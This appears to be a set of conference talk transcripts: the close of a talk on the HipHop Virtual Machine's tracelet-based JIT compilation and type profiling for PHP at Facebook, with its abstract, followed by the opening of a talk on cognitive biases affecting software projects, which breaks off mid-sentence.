machine as opposed to a register-based machine? Right. Actually, that's a great question. And I'm going to sort of give the short answer because this is the subject of debate. And we could talk about this. The reason why people may disagree on this. And the short story, and Java also chose a stack machine as you mentioned. So the short story is stack-based, the stack machine code is easy to generate, easy to interpret, easy to look at. Kind of, it makes for an easy, basic tool chain. Right. And it was a register-based thing. You got to have like a register allocator and kind of all of these esoteric things. And there's a paper I recall from a colleague mentioned to me that there's an equivalence that has been demonstrated. Like you can take code for a stack machine and make it for a register machine. And the other path, the other way is much harder or something like that. So there's pros and cons all the way. But essentially choosing a stack-based bytecode makes for very small bytecode that's understandable. So actually, size of the bytecode is also a big thing. So this is very compact because it uses the stack implicitly as opposed to put this in register A, put this in register B, and so on and so on. So, all right. Care for an invite tonight? Okay. I'll put it for you. Feel free to come take it. All right. So the first insight here is that we don't want to kind of optimize across jumps. So we want to take a basic block at a time. In compiler, write a terminology, a basic block is a block that has no jumps anywhere, has no branching, no if, no while, no nothing. That's a basic block. It's like a contiguous streamlined code. And we're going to specialize for specific types or combination of types and our underlying goal being incremental type discovery. And here's how it works. We define this notion of tracelet. And the tracelet is going to be one of these basic blocks inside which the types are given, known. So once you have a tracelet, you get to actually generate like machine code for you that's fast and efficient and everything. And this is very interesting because then you have a sort of a collection of tracelets that kind of interact with each other and you can combine them depending on the types to obtain pretty fast code. So the traces are built just before running them. And of course, cached, there's a repository of tracelets. And they're translated to machine code which is also in that cache, the repository. And then they're going to be changed appropriately to get work done. This is sort of good and bad because in PHP, the average length of a tracelet is just a few instructions. So it's not very like, you know, in like good compiler, you want to have like as much code as possible to optimize over, right? You know, like inter procedure optimization like whole program and then you have inside a function and you have inside a block and so on. And the best optimizations are those of larger scope, they're slower but they optimize very well. So in this case, it's kind of a disadvantage that traces are so short. So, well, at the trace of boundaries, we're already to have an on stack replacement to interpreter and this is good because this is what you want is to kind of have the interpreter and the tracelets kind of replace each other at a moment's notice. And let's take a look how we built a tracelet for this particular call. So my max, two numbers, two integers. Here's the initial code. As I said, tracelets, contiguous, they're going to have no branching. So this is my first tracelet, right? And this is my sort of abstracted away tracelet with, you know, jump Z wherever. And it's a very short kind of sequence of code but you'd be amazed how much we can do with it. So we have two locals, we know, and we type this particular specialization with int and int. So by this point, we have a tracelet that's guarded, I know it's an int and I know it's another int and based on those assumptions are going to generate code. Once that's happened, well, hold on. So greater is going to be a function that takes two ints and returns a bool. I know that because I have the guard here and the jump is going to, the conditional jump is going to be like a function that takes a bool and returns nothing. It's a continuation. So, wow, very interesting. So at this point, this greater can be specialized, which is a big deal, it turns out. It doesn't have to be a greater than knows about all types in PHP. It's a greater than knows only about integers. And then, and here's where things get interesting, we get to take this tracelet with the guards. So these are the guards. This is an actual bytecode for PHP. And we actually translate the guard, which is, well, is the type, this is really like, you know, look at the first, the type tag of the first argument and look at the type of the other argument. And if they don't match, they don't match this guard, then actually I'm going to retranslate kind of take the, you know, the alternative route. And this is, you know, this is the code generator for that thing. How much faster do you think that's going to be? So my max of 10 or whatever, and instead of interpreting this thing, you're going to actually do this. So you have, well, we have two jobs here that are going to guard. And then I'm going to have the classic, I move into registers and compare the registers and jump and such. Well, and put it this way. It's fast enough that even a mediocre code generator, right, even a mediocre code generator with the strategy is going to do better than the interpreter, right? So once you have this whole strategy of specializing depending on the types. All right, so continuing that, so we have some more stuff, some of them we have some more stuff and we have some more stuff here. So we have a very small trace let there. And we're going to teach this, these trace let's together, okay, int, int, this is my trace let, int, int, this is my second trace, which is like just a return, is an extremely short trace let. And they're kind of tied together, stitched in our cache repository. And all of a sudden, you're going to have a working program, a working function. And it's going to do work for integers only. Well, what happens if I call the thing with, let me see how, okay. What are we going to do if you call it with strings, then it's going to essentially jump at the guard is going to jump to the retranslation flow, which is going to generate, it's going to do the same for strings essentially. It's going to say, well, I'm going to generate code for strings. In the string case, you don't want to do the inline code, you want to call a function because it's just more, much more complicated. Very interesting. So once you have instance strings, you kind of, you know, generate code for strings and re-use it because you have the cached trace let's and they're generated code. So you don't need to generate code twice for the same trace let. Now, here's the problem. You know, do you feel this, you know, these guards here, you have any combination of types is going to generate yet another trace let. So you have this exponential thing. So consider like, you know, you have like three types and then you have any combination of the three is like two to the power of three. Actually not two, but it's the number of PHP types to the power of whatever, how many arguments you have. So it's kind of getting really, really messy out there. And statistics, it's a long tail, but it's a very, at the end of the tail is very thin. It's like a rat's tail if you wish, right? Okay. So it's, you know, there's a lot of types, exponential and everything, but beyond six, 12 items, you're going to have only this many chains that are kind of left to the interpreter to take care of. So statistics again, the principle here being we're going to address the most frequent cases with compile code and, you know, kind of the long tail, the complicated stuff that's kind of combination of types that nobody heard of. We're going to let the interpreter take care of them. It's not going to affect our speed because of the sheer statistics. Yes? Okay. So you find a study correctly. The question was, do you profile what types are more frequent and how that evolves with time because maybe during startup you have some combination of those types and then later on there's others, right? We kind of do that. We have some warmup procedures and whatnot. So actually, you know, you're kind of addressing a very direct question. But in general, for let's say a sort of a stable jit that's loaded, there's little variation over time with the most frequent types. But it's a legitimate concern to have. Now, let me make one more point. This is going to do really bad in microbenchmarks. By microbenchmarks, you load this much PHP code, you run it and you go away, right? And we're like, you know, we're like lost in the, you know, we're not doing well at all in these very small benchmarks because if you just run some code once, the whole jit thing is not even going to enter in action. It's just going to let the interpreter do the work. And they tell us, you know, as a good interpreter, you know, it's just not optimized to be the best interpreter around. So it's doing pretty bad in these benchmarks. But on benchmarks, the whole sites that they're going to show, these are much more interesting. So the camera didn't work after all of it did it. All right. So as a good, you know, as a good sort of extra point, consider like methods and functions. Well, again, you don't know what they return. So our early approach was, well, whenever you have a return value, it's considered like a jump. It's considered like, you know, break the trace, let it start all over again in a way. Later on, so this is an example, like you may have a class that gets a name, returns this name, and you have a constant string here. And what type do you get here at object get name? So what we ended up doing is called type profiling. There's some work that's fairly old by now. It's well known and well used, value profiling, which is, you know, this particular function, like square root or, you know, square sign or whatnot. It's going to be called frequently with certain values. And I'm going to generate, like, optimal code for those particular values. And then I'm going to sort of, for the others, I'm going to use the generic approach. So this value profiling is well known and well understood. For us, it's type profiling, which is, depending on the type of the value, we're going to generate different code and such. Now, the thing is, if you want, if you go with this approach of type profiling, you're going to take long calibration, which is exactly the startup problem we mentioned, like, you know, how long until we decide that, yeah, this function returns this value all the time or most of the time. So the next idea on the board, which was successful, was, well, let's use profile names, which sort of uses the name of the function, and we map method name to return type into a table, a hash table. And the system kind of learns things like methods name get name return strings. Big surprise. It's kind of, it's a great heuristic. I think that Keith, who invented this, is a brilliant guy, and he had this strike of genius, which was like, it's the name of the function dummy, which kind of tells you it's type. So, well, this works everywhere, like, you know, methods, free functions, whatnot, and it exploits the ways that humans naturally write code, which brings me back to the social coding aspect and all that. So, consider that our code base, even though it has millions of core sites, it only has like 13,000 or so actually unique symbol names. And the accuracy is like amazingly high. Let me give you some examples here, which are kind of interesting. Well, reset is going to return null. Get timer is going to return int. Big surprise. Get the logged in user is going to be the user ID. Is fb employee is going to return bool? Array pull is going to return an array and so on. So, pretty nice. It actually kind of just works. And it's hard to imagine that HTML to TXT is going to return a double, right? So, this is one of those things that just work. And now let's make it work fast. So, let's kind of push the pedal, seal the pedal to the metal, see what happens. On today's JIT, compared to Zend, like, it would do really, really well. And because, you know, Zend is a very mature technology. It's sort of a mature interpreter and people have invested a lot of work in it and such. And this kind of, this stands as a, you know, one of the proofs that actually even an OK JIT is going to do a lot better than a well-tuned interpreter. So, you know, this would be a good take away for today's talk that actually it depends on the technology more than the details on how you do it, sort of the big results. And, but again, if I were to show you the benchmark, the, you know, the micro benchmarks, Zend would do better, which is kind of interesting. But we don't care about micro benchmarks, we care about running the site, right? There's the inevitable kind of bragging here. So, actually people start to discover that HPHVs need really fast. And here's an example of a success story. WordPress on HHVM runs faster than pretty much anything, including our own static compiler. So, it delivers much more many requests per second than Zend or other interpreters. So, these are Facebook technologies. And this has very direct money implications. Consider the Facebook CPU idle. So, these are days. And this is the how many, you know, percent idle in the CPU on a typical server on Facebook. Actually, this is averaged. So, and the red line would be the static compiler and the blue line would be the JIT. What interesting, I mean, they look almost the same. So, first of all, like, let me ask you this. Why is it like that? I'll give you a card. The edict cycle, yes. So, day, night, whatever, right? Actually, it used to be much more pronounced, but since we have so many international users, it's kind of, you know, kind of, I give you a card, right? In good shape. Okay. So, that's the edict cycle. Day to day, people, you know, and what's one interesting thing about this graph? Red versus blue, although they look almost the same, there's a big difference between them. Yes. The blue is a bit below at the, yeah. Careful, okay. So, the blue is below. So, below, like, low CPU idle, it means, what does it mean? Utilization. Utilization, exactly. So, the utilization is higher. So, the nice thing is that, I think I reversed the thing. So, the red is kind of the good thing, which is kind of, you know, counterintuitive. So, essentially with the jit, you get to do the same work with less, with more idle time. Sorry, I was wrong. So, more idle time. So, the red line is good and the blue line is bad. And this difference, the key point here is that you provision your servers for maximum load. You don't provision a server for minimum load. So, this I don't care about. I don't care about this, like, maximum idle. I don't care. I care about this because here's how I dimension my servers. Here's how I decide to buy servers and, you know, let stuff and power sources. So, this is important. And the more I can move this up high for the same functionality, the better I'm off because I don't need to buy that many servers and pay so much money for the power. So, the difference here, we're looking at, you know, a good, like, 6% here and here and here and elsewhere. We're looking at a good more idle time per machine, which means the machine are going to consume less power and the power costs less money. So, this is very nice. And again, I mentioned this in my other talk today. Essentially, every 1% we save is literally, like, you know, a vast amount of money per year saved in power costs. It's very powerful. So, you have, like, you know, some of the best, most, most senior engineers who work on that. It's a huge deal. And I presume it's only going to be a huge deal going forward into the future with computing that technology at large in general. So, I think this is sort of a big deal. Yes? So, the question is, first of all, these guys perform at the same rate, kind of, approximately, yes. So, the difference in request per second are minor. And the actual question was, well, do you care about having as much idle time as possible? Kind of not. Yes. And the answer is whenever you have a major event at Facebook, like the Air Spring or, you know, the Boston marathon disaster or, you know, a lot of good events that are very popular, a FIFA World Cup and whatnot, there's going to be a high load. So, you got a provision for, like, here. You got to be ready to handle this. You don't care about this. You care about this. So, the more you can, you get to kind of save on that bottom there, the better you're off, right? And indeed, at this level, that means essentially we're consuming less power for the same work. All right. So, the static compiler is not in production anymore. We actually took time and I participated in that. I'm very happy. We took time to remove the old code, the static compiler to C++ from our C++ implementation of the JIT. So, we can't directly compare. But last time we looked, HHVM was about 20 percent better. And don't forget that the static compiler was already pretty darn fast compared to, like, the state of the art zen and others. And at launch last November, it was, like, already 8 percent. And I perceive it to be, it's very fun. Like, at Facebook, we're like, oh, lockdown. We got to improve 10 percent. And every engineer on the team was kind of working on optimizations that would, you know, gain half percent, one percent. And we added those and we had a graph, we had Jean-Claude von Damme doing a dance at the end when we made it 10 percent. And it was kind of a nice curve, meaning that, you know, if you continue on that trend, we're going to be like, you know, we're going to be faster than the CPU itself. That's a joke. All right. So, this is great, but it also means we eliminated a lot of craft and we can't compare it directly against HPHPC. All right. To conclude, the virtual machine, which is open source, by the way, can run your PHP. It's very fast and it's good for production, it's good for development because the compilation time is just as you'd expect, like, really fast. And our claim here is that type inference is the first order, you know, the top most issue for dynamic languages. If you have good type inference in your, in your JIT, then you're going to have a good JIT. If your type inference is kind of not there, you're going to have a crappy JIT. And there's a lot of work that's left and I'm going to sort of mention a few things that are my mind. So, I have this big repository of these little tracelets and the generated code. And one question is like, you mentioned this, like garbage collection, like, you know, what happens here? That some function, some particular tracelet is very frequently used at some point in the lifetime of your machine, but then it's kind of, you know, kind of falls out of favor. Nobody uses that crap anymore, right? So, what you're going to do, so you generate these tracelets and at some point you kind of saturate, it's like, oh, we're kind of full with tracelets here, we have enough. But some of those are going to be less used than others. So, the question is, do we have a cache eviction policy there? You know, what should we do? And there's work on that. So, we're kind of thinking of how to address that. Other topics that come to mind are things like extensions, like, you know, a lot of high-performance PHP code, master reliance, C++ extensions, because it's difficult to write really, like, tight loops in PHP. And, you know, one class, yes? So, the question was, did you think of doing what TypeScript does, which is allow optional annotations by programs of types? I can't talk about that now. All right. Other questions, quickly please, yes? Oh, by the way, that does deserve a card. Are you in town tonight? All right. Here it is. Yes? HHVM, yes? So, the question was, does your jit assume you're having this model of the script that I send the end of the request? Actually not. So, the way things happen really, yeah, each request dies and everything, but actually the engine, the jit engine stays loaded for many invocations, for many requests. You don't load the jit for every request, right? So, the whole isolation between requests is at PHP level. It's not at the jit level. You see what I'm saying? So, after jit, it's sitting there, it's loaded, and kind of loading it and uploading it and stuff is kind of what an issue of its own, very interesting. We use, like, bit torrent and that kind of stuff to distribute these things. But essentially, the jit stays loaded in memory and collects the statistics over many of these requests, right? It's not just one request I'm looking at. Because one request could be, like, half a second, right? How long does your average Facebook page take to load? It's, like, you know, 200 milliseconds. So, you can't really gather statistics from one thing. So, essentially, the jit sits there, looks at requests, collects statistics, collects tracelets, does its work, right? If what you're looking at is optimizing one short script that you run once, maybe jit in general, not only this particular incarnation, is not for you, right? So, what you want is sort of loader, either loader long running program or loading many short, short-lived programs in this jit. And by the way, that brings me to a different research topic that we're kind of working on, which is the following. We have many millions of, not many millions, we have many servers. I don't know how many. So, we have many servers at Facebook, data centers and whatnot. There's plenty of computers. And each is collecting its own statistics. Why? I mean, pretty much the workload on any two given servers is going to be about the same. So, why not sort of have a distributed caching and sharing mechanism for these compiled tracelets? And then you get to use much better statistics because you can collect over days instead of hours. And you get to, you know, share work. So, you can, I have the trace for my min here. So, I'm going to use the one in, you know, in our service in Sweden or whatever, right? By the way, we just opened a server in, what's the name? It's in Sweden. It's like by the Arctic Circle, where it's like, you know, the night is about to start, like, right now. Right? So, great. Card are in town. Don't forget to pick it up, folks. Okay? All right. Congratulations. Cheers. Don't drink too much. Don't drive. Yes. In the back. Yes. Is it for Java in particular? Oh. I wouldn't know about this particular course of system in particular, but I have a colleague, Keith Adams, who contributed a lot of these slides. And essentially, he has like, he has another talk in which he kind of explains all the technologies they looked at when they started this and, you know, kind of neither was exactly there for our kind of workload. So I can only presume that, you know, he looked at that and he didn't quite work well for our case. Yes. Do you have any questions? Do you have any specific questions? Ah. So do we have, wow, I have really good questions. So not a lot of you guys, but really, really good questions. So let me kind of restate the question in my words. So do you have the same JIT instance for a lot of different requests as opposed to some sort of JIT specialization for, you know, I'm going to serve only with the home page from this JIT? The answer is we use the same JIT for a variety of requests, but this whole notion of JIT specialization is extremely interesting. We thought about a bit about, like, you know, what do, you know, how do you cluster requests? Like, requests for, like, I don't know, images, I'm sure they have a very different workload than requests for, like, text, you know, and kind of stuff. So actually, this, yeah, this is a super interesting topic. So, you know, maybe we can chat about it tonight. This is very interesting. I'm actually very pleasantly surprised to hear that. So this is great. All right. We have time for a few more questions, yes? What if your code base uses a lot of objects? This is a real problem. Thanks for asking. So actually, it's kind of funny. This is a, because somebody asked, like, what happens over time, like, you know, for a given team? And it's very interesting that the PHP code base at Facebook has with time become more sophisticated. Like, before, I was like, yeah, yeah, just, you know, let's kind of grow and it does kind of all simple and kind of a simple feature site. But right now, we have objects for everything. And actually, at this point, I forgot the statistics, but actually, a lot of our data, like, dollar A you receive, is an object, actually, right? And that was not the case, like, seven years earlier, which makes for a very interesting analysis in evolution. So we do have specialization for objects. For example, methods, so what type does the methods return that's already working, right? But for objects in particular, there's some interesting issues, like, you know, you want to, you have an object and it has a schema because it has always has a get name, get ID and I don't know, send request or whatever, right? It has, like, given method names. And we're looking at how to optimize particular calls for these kind of known methods. So there's more work to be done, but we already kind of are prepared for that. So we're in good shape. Okay, for one of these? All right. Awesome. Yes. If you look at, if you look at, maximum function, yeah. Yes. Let me go back to the function real quick. Okay, so let's start from here. So the question was, you've had the MyMax function and you have three basic blocks. Yes. Right. So, okay, let's see the function itself. Yeah, this is the whole function. You have three basic blocks. Yes. And, okay, okay, okay. So the question was, well, so you have one function, you decompose it to basic blocks and then where's the logic that kind of knows that the blocks are coming from the same function, right? Right. Well, I didn't give a lot of detail about this, but the magic here happens in the, in these connections here, right? Let me kind of bring the, okay. So in the connections here, and we have some interesting rules. So a given block can have multiple entries, but only one exit and things like that. So essentially, although the blocks do not nominally belong to a given function, you know what the interleaving is because, but you could have the same, you could have actually the same code in one tracelet and have it linked differently so it can appear multiple times because of the links. So, you know, it's the same function because of the connections. And that's also the disadvantage because you get to have multiple instances of the same blocks. So there's sort of a bloating of blocks, but that's not, that's not really a material. It's not a lot. Okay. I think we only have time for, I've seen a person who came like after the previous talk, so I think we're about done. So with this, I invite you all for talking with me after this. I'll be here for a couple more minutes, and I would like to thank you for coming here. Thanks a lot.
|
Facebook platform's enormous success has been fueled in part by the LAMP stack. A large PHP code base leveraged over many servers poses unique efficiency challenges, both in terms of machine utilization and electric energy consumption. The open-sourced Hip Hop Virtual Machine is running on all of Facebook's production servers at better efficiency than all of today's PHP engines. This talk describes the state of the art in getting PHP code to run efficiently through a combination of bytecode interpretation and Just-In-Time compilation and optimization.
|
10.5446/51539 (DOI)
|
Alright, hello. How was everyone? Thinking about lunch already? Yeah, okay. Dynamite. You having fun so far? Okay, that's good, that's cool. Alright, well, so if you're anything like me, by now you've been to a whole bunch of talks and you've heard stuff about C-Sharp and functional programming and Agile and this and that and your head's about to explode, right? Good, cool. Well, this will help. This will really make it just burst out. So I love this, I love this background picture here. Alright, what if my clicker worked? Come on clicker, you can do it. There we go. Do you know what this is? This is in fact the first bug. You've heard the story about when they were debugging the, what was it, the Mark II relay calculator, September 1945 and they had this problem, this was a relay calculator, they're going through running a sign and cosine unit test, bless their hearts, they're running it and there was a bug and they found there was a moth trapped in the relay. They took the moth out, taped it to the log book and that was indeed the first incident of debugging a computer. 1945, an old joke. So we've had bugs in computers for a long time, sometimes literally so, but as it turns out, we've got bugs in the very way that our brains work. We've got quite a few of them in fact. So I want to go through today and just show some of the more interesting or amusing or common bugs that affect our decision making, how we write software, how we do agile processes, all these sorts of things. The first thing I want to talk about is how we're creatures of habit. So here we've got the policeman out to give tickets behind the sign that says, slow down, the cop hides behind this sign. Clearly he's still hiding there, just creature of habit. But it's kind of funny, they do a lot of studies on selective awareness and gradual change and it turns out we're really not nearly as observant as you might think we are. And I've got a couple samples here just to show how that works. The first thing I want to show is a fairly difficult counting task. So what's going to happen is you're going to see a bunch of kids passing a basketball, wearing some wearing white shirts, some wearing black shirts. And the idea is you've got to really focus on the players in the white shirts and count how many times they pass the basketball. Now it's not impossible, this isn't like one of those trick, you know, sight questions. You can actually do it but you just have to focus very closely and count the total number of passes. Alright, you ready? Okay, Twitter down, email down, here we go. We're going to count the number of passes. Count how many passes? The correct answer is 16 passes. Did you spot the gorilla? For people who haven't seen or heard about a video like this before, about half missed the gorilla. If you knew about the gorilla, you probably saw it. But did you notice the curtain changing color or the player on the black team leaving the game? Let's rewind and watch it again. Here comes the gorilla and there goes a player and the curtain is changing from red to gold. When you're looking for a gorilla, you often miss other unexpected events. And that's the monkey business illusion. Learn more about this illusion and the original gorilla experiment at theinvisiblegorilla.com. So I used to show the original version of this, just the regular gorilla experiment where you've got the kids passing the basketball and the gorilla walks in and they're like, I've got 15, I've got 17. It's like, great, did you see the gorilla? The what? I need to show it again. And how can you miss it? You see it the second time and it's like, how do you possibly miss this? But we do. So this has been around the interwebs, people got used to it. It's like, I know this one, I know about the gorilla. Yeah, great, did you catch the curtain changing color? Did you catch the player leaving the scene entirely? Right out the edge. But that's okay. I mean, these are, this is a very busy video. You know, there's a lot to keep track of, a lot of motion, you're trying to keep track of the passes. So let's try something a little simpler, perhaps. I'm just going to show a couple of single still photographs. Nothing's moving, but something's changing. Raise your hand when you spot the change. How'd you do? Oh, oh dear. That whole bit of greenery went away. Okay, let's try the next one then. Now, now, now you got warmed up now. Now you know what to look for. We'll try the next one. Okay, let's try the next one. Okay, you got warmed up now. Now, you know what to look for. Okay, a little better. Okay, you got warmed up now. Now, you got warmed up. Now, okay, only a little better. Okay, this is an easy one. You'll definitely get this. Yeah, the entire side goes away. So, it's interesting, you know, we're really just not well equipped to notice slow moving things. You know, gradual change creeps up on us and we just don't notice it. This is a real problem. If you're on a software project, what's changing? Everything. Right? The requirements are changing, the technology is changing, there's stuff changing all around us and we're not really well equipped to see that or to experience it. So, that's kind of the first interesting thing. But I like to go on, I mean that's just sort of fun. You know, we're blind as bats. Okay, fine. But I want to talk about some actual sort of processing errors, if you will, in how our brains operate. If you look on, say, Wikipedia and you look up cognitive biases, there are some 90 common known cognitive biases. I've certainly met people who can exceed that number by a good bit, but there's 90 common ones. And I'm just going to go through some of my favorites here and just talk about them for a little bit. The first is relying on memory. Our memory is so bad. You know, we tend to think of memory as like a hard drive. You know, something happened and it gets written to disk and we've got it. Maybe we'll forget it, but at least what we remember is accurate. Right? Now, it doesn't work that way. In fact, the way that memory works, every time you access a memory, you change it just a little bit. You access it enough over the course of a lifetime, it can change quite a bit to the point where that incident that you think you remember when you were six years old probably didn't happen that way. Maybe it didn't even happen at all. It's very easy to implant false memories into people and to suggest things were very suggestible. And every time you access a memory, that rewriting takes place in your current context, how you currently understand the world, your current age. You know, so every time you're accessing it, it changes a little bit. This can get really difficult on a software project. You're sitting there, it's months and months into it, and it's like, why did we decide to do XYZ again? Oh, well, because, and you're going to get 15 different answers because everyone will remember it differently. This is why it used to be good practice to keep like an engineering log or something where you just scribble some notes to yourself. You know, when we had this meeting, we decided to use this component because XYZ. That's a great thing to do because then months later you can go back and look, why did we decide to do that? Oh, yeah. We thought that at the time. Okay, makes sense. This is different now. Now we can do this, whatever and ever. But if you rely on memory alone, even communal memory in the team, it's very foggy, not reliable at all. Some other things that can throw us off the track a bit. There's this great experiment related to a phenomenon called anchoring. The way this works is our brain is always seeking patterns, trying to find stuff to compare, but it's not always so picky about what it compares, and it can get confused really easily. So for instance, if I started talking about the fact that my publishing company, our publishing company, the Pragmatic Bookshelf, that we have hundreds of books for you to peruse. We've got hundreds of authors, and I keep tossing out this word hundreds in various contexts, and then I say, here's a nice leather-bound edition of Programming Ruby for $85. Your brain somewhere says, oh, that's less. That's a bargain. It has nothing to do with it. They're completely unrelated. Doesn't matter. Your brain seizes on that. So they did an experiment with undergrads doing bids in an auction. And before the experiment, they prepped the group and said, okay, if your Social Security number, your national identification number, your driver's license number, whatever you have, take your number out and write down just the last two digits. That's all. And now we're going to go ahead and bid on this auction. And what they found was people in the audience who had relatively high last two digits tended to outbid the other students by anywhere between 60 and 120 percent. They bid twice as much on the objects. They perceived their value to be twice as much solely because the last two digits of their ID number happened to be high. We do this kind of thing, unfortunately, all the time. Marketing people know this. The politicians know this. And they use this to their advantage. You anchor on something and then you make the wrong decision. We'll talk more about that in a bit. Another interesting thing is the fundamental attribution error. And I just love the picture. The problem here is lack of context. We have an innate system. Maybe it's some kind of ego prevention. But if I've done something terrible to the team or something bad to the code or whatnot, it's because I had a bad day. I missed breakfast. I didn't get a good night's sleep, whatever. You have kind of an excuse for it. If you do something bad, it's because you were born that way. It's because you are from this part of the country or that or from this country or the other or this political party or this race or this species, whatever it is. It's because you are you that this happened. Whereas if I did it, that was just context. That was just whatever. So we have this mistake of attributing something to the fundamental behavior of a person instead of the context that a person is in. Something to bear in mind. You can see this a lot on internet troll fests when the comments start flying. It's not that your position is wrong. It's you are an idiot and your mother has had sex with farm animals or whatever. It degrades pretty rapidly. So just something to bear in mind. It's context. It's all about context. Now the next one is particularly bad for agile projects and agile adoption. And that is a built in need for closure. And Dilbert sums it up quite nicely. Dilbert says, I didn't have any accurate numbers so I just made this one up. Studies have shown that accurate numbers aren't any more useful than the ones you make up. How many studies showed that? 87. You laugh. The problem is and this one is really pernicious because right every project starts off and some being counter in accounting says, okay, I got there's a spot in the spreadsheet I've got to put a number in. How much is this going to cost me? And you give the agile answer, well, we don't know yet. It's exploratory. We'll find out. No, no, no, no. I need a number to put in the box. I don't have a number. I need 87. Good. Doesn't matter. Doesn't matter. And this is a curious thing. All parties concerned, including the requester, are well aware the number you just pulled out is rubbish. It's garbage. They know that. It's okay. It's a number. I have satisfied my need for closure. I have a number. I know it's wrong. I don't care it's wrong. I have it. I can get my hands on it. I'm happy. This happens unfortunately all the time. You know, you say, well, you know, what technology are you going to use here in this project? Well, we haven't decided yet. I got to fill that out. I have to know. Okay, fine. We'll use SQL Server. We're not really. But fine. You know, I write it down. Oh, yeah, we changed our mind. We're using amnesia instead. We're using MySQL or we're using, you know, what have you, Mongo. But you've got to have that need for closure. This flies in the face of agile development where we want to leave all our decisions open as long as possible, defer decisions, and make them late in the game. This is a really hard one to get by. Some folks have an easier time with this than others. A lot of folks, this is really hard. They have to have closure even knowing that the number is wrong. Confirmation bias, another popular one. You see this a lot on the TV news cycle. Any facts or events that don't fit your worldview, you just throw out. So you just amplify the stuff that you agree with. And of course, the whole world thinks this way because look, everybody agrees with it and you throw out the rest of it. Entire books. You know, every author who writes a book with any opinion in it, you could argue that's just a big example of confirmation bias because they're going to throw out the other stuff that disagrees with them. That's just how we work. The exposure effect. This is a great one. The more often you see something, the more acceptable it becomes to you. The more familiar it is. Politicians know this very, very well. And that's why they will do everything to get their face out there. They will play sacks in the bar. They'll get their picture on the poster. They make sure you know their name. Even if they're a scumbag, you know the name. So when the time comes, you're like, okay, here's a name I know versus some name I've never heard of, you're going to go with the familiar. It's the way it works. You see something over and over and over again, even if it's horrific, even if it's horrible, even if it is the intellectual equivalent of broken glass on a toilet seat, it's familiar. And you will stick with it to your detriment. Even if the plane is crashing, you will stick with it. Familiar is not good, but we conflate the two. Just like in that anchoring experiment, we just get kind of muddled with it and we confuse them. If something is damaging your project, if it's not good, dump it. Get rid of it. It doesn't matter how familiar it might be. There's the Hawthorne effect. This is a lovely one. This is the deal where consultants come in. They're studying your team, studying your organization, and suddenly everything's working great. They've got some new giga they're trying to sell, some new process, some new tool. Everyone's using it. Productivity's up. Numbers are great. Everyone's happy. What happens when they leave and stop watching? Everything goes right back to the way it was before. We work differently if we know somebody's watching, at least for a little while. Relativity. So when, what company was it made, the first bread maker? I've lost track. And the font's too small. William Sonoma. They made the first automatic bread maker. This thing was a marvel. You open up this little R2-D2-like box, stick some flour and water in, hit the timer, and some hours later, a baked loaf of fresh bread comes popping out of it. This was a marvel in what, the early 90s, I suppose it was? An absolute marvel. The problem is, they were the first to market with it. So how do you price the thing? Oh gosh, I don't know. So they picked a price, set it, put it out there, you know. Harold did this technology. This was incredible. Fresh baked bread and all you do is hit the button. Nobody bought them. Sales were modest at best. And they're scratching their head. They didn't know why. So they fished around, talked to some psychologist types and said, okay, I know what we're going to do. We're going to keep this at about the same price it was, $250. Doesn't matter what units. Pick a unit that's comfortable to you. But we're going to come out with the luxury model, the high-end model that does many more things and price it at twice the amount and put those two out there. Suddenly, no one ever bought the big one. But now they bought the middling one because it was perceived to be a bargain. Because you start off with the question, well, okay, is this a good value? Well, I don't know. What does a bread maker cost? I have no idea. They just invented the thing. But now, what does a bread maker cost? Oh, well, it either costs $500 or $250. Oh, look, this $250 one is a bargain. It's half the price. Okay, right? I mean, they made these numbers up completely. These aren't even the real ones. But you make it up completely because now you've got this false relativity to concern with. It's like, oh, this is less. I will go for it. We fall for it every time. We fall for free. Free is not the same as cheap, however. Free is immensely valuable. Free is awesome. Free is better than one cent or one franc or one kroner or what have you. In fact, when Amazon.com first rolled out their Amazon Prime option, you could pay a flat rate and then shipping was free. Right? And they're like, this is going to be dynamite. They rolled it out in the US, sales took off. They rolled it out in different other countries, Asia, Pacific, Europe. Sales took off. Worked great everywhere except France. They rolled the offer out in France. Nothing happened. What was up with that? So they looked into it a bit and they discovered for whatever reason the French division, when they did this, the free shipping wasn't actually free. It was cheap. It was like one franc or Euro, whatever they had at the time. It wasn't free. It was very cheap. Didn't count. People did not fall for it. They changed it to free. Their sales then matched everyone else. Popped right back up again. Why do we do that? Well, that's a good question. We're cheap. We like free. We have a very strong sense of loss aversion. We don't want to lose anything that we already have, which is kind of funny. There's an example. I'm not sure if it's in this talk or not, so I'll just give it now anyway. Have you ever heard of the South Indian monkey trap? Wonderful thing. Apparently, there's a lot of monkeys running around Southern India and you need to trap them. Okay? So what you do is you dig a hole in the ground with sort of a narrow entry and then a hollowed out part and you put bananas or bait, whatever down in it. Monkey comes along, sticks his hands in, grabs the bananas, can't get back out again. The entrance is too narrow. Simple thing to do, right? Just let go of the bananas and you'd be free of the trap. What does the monkey do? Right? You sit in there, chattering away, stuck because they will not let go of the bait. They are so loss averse, they will not let go of the bait and they get trapped. Happens to us in a similar manner. Sometimes you just got to let go of it. Reasons we fall into some of these traps. I want to talk about symbolic reduction. So what happens here is we tend to focus even on the wrong questions a lot of the time. I had to move houses recently and as part of that I had to clean up the back of my office. So this was a very terrifying prospect. I'm sitting there going through this mountain of cables, right? And in the middle of this bundle of cables I found an old 19.2 modem. Wasn't hooked up to anything, just this ancient modem in this ball of cables. It's like, wow, that was, it's like archaeology, right in the office. It was awesome. But I also found a bunch of old magazines from sort of mid 1990s kind of time period. Objects something or other, Java something or other. I, you know, a bunch of these kind of popular magazines at the time. And the headlines were the same on all these magazines. The huge questions of the day. Who will win the desktop wars? Will it be motif or open look? Wrong question entirely. Missed the whole web thing entirely. And right after that big debate and this went on like a year, two years, these were the headlines. Another set of headlines. Who will win the middleware wars? What will be the triumphant technology? Will it be Corba or RMI? Neither, right? Dead, missed the web, missed it completely, you know, missed the dominance of the PC. Totally the wrong question even to ask. And all of these, you know, you can go through other periods of history and find the same thing. Who's going to win A or B? And the answer is almost always E, none of the above. It's none of the contenders you think it is. So we make predictions. This is kind of part and parcel as how our brain works is to go in and try to, you know, see something and predict what's going to happen on a daily basis. Even just reaching out, grabbing a thing of water, walking. We're constantly making predictions. But to predict anything longer range than, you know, say even a couple of minutes, we're really bad at it. Largely because some unexpected event changes the game. You know, in that case the introduction of the IBM PC, changing the face of the desktop, later the Mac, advent of the web, all these kinds of things. These were more or less unforeseen events. So there's a great book out there whose name just went out of my head. Talib wrote it. Black Swan's in the title somewhere. Google will find it for you. But the idea of a black swan is that some very high impact, hard to predict event, will change the shape of what you're trying to 